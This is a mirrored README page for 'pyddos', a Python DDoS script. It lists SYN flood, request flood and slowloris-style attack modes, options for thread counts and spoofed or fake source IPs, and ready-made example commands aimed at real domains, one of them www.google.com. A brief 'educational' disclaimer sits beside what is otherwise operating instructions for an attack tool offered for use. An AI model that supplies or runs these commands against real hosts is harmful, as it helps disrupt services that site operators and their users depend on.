项目作者: mach1el

项目描述 :
DDOS python script
高级语言: Python
项目地址: git://github.com/mach1el/pyddos.git
创建时间: 2016-02-14T05:06:45Z
项目社区:https://github.com/mach1el/pyddos

开源协议:

下载


pyddos.py

  • This is my new update
  • This script have 3 type of ddos attacks : SYNFLOOD | REQUEST | Pyslow
  • Script has pyslow attack type which is similar to slowloris attack

Note

  • I wrote this script for educational not for destructive purposes and illegal actions, so I won’t be responsible for that

Requires module

  • termcolor
  • colorama

Usage

  1. _ \ __ \ __ \ ___| _) |
  2. | | | | | | | | _ \ __| \___ \ __| __| | __ \ __|
  3. ___/ | | | | | | ( |\__ \ | ( | | | | |
  4. _| \__, |____/ ____/ \___/ ____/ _____/ \___|_| _| .__/ \__|
  5. ____/ _|
  6. DDos python script | Script used for testing ddos | Ddos attack
  7. Author: ___T7hM1___
  8. Github: http://github.com/t7hm1/pyddos
  9. Version:3.0
  10. usage: python3 pyddos.py -d [target] -p [port] -T [number threads]
  11. optional arguments:
  12. -h, --help show this help message and exit
  13. -v, --version show program's version number and exit
  14. options:
  15. -d <ip|domain> Specify your target such an ip or domain name
  16. -t <float> Set timeout for socket
  17. -T <int> Set threads number for connection (default = 1000)
  18. -p <int> Specify port target (default = 80) |Only required with pyslow attack|
  19. -s <int> Set sleep time for reconnection
  20. -i <ip address> Specify spoofed ip unless use fake ip
  21. -Request Enable request target
  22. -Synflood Enable synflood attack
  23. -Pyslow Enable pyslow attack
  24. --fakeip Option to create fake ip if not specify spoofed ip
  25. Example:
  26. python3 pyddos.py -d www.example.com -p 80 -T 2000 -Pyslow
  27. python3 pyddos.py -d www.domain.com -s 100 -Request
  28. python3 pyddos.py -d www.google.com -Synflood -T 5000 -t 10.0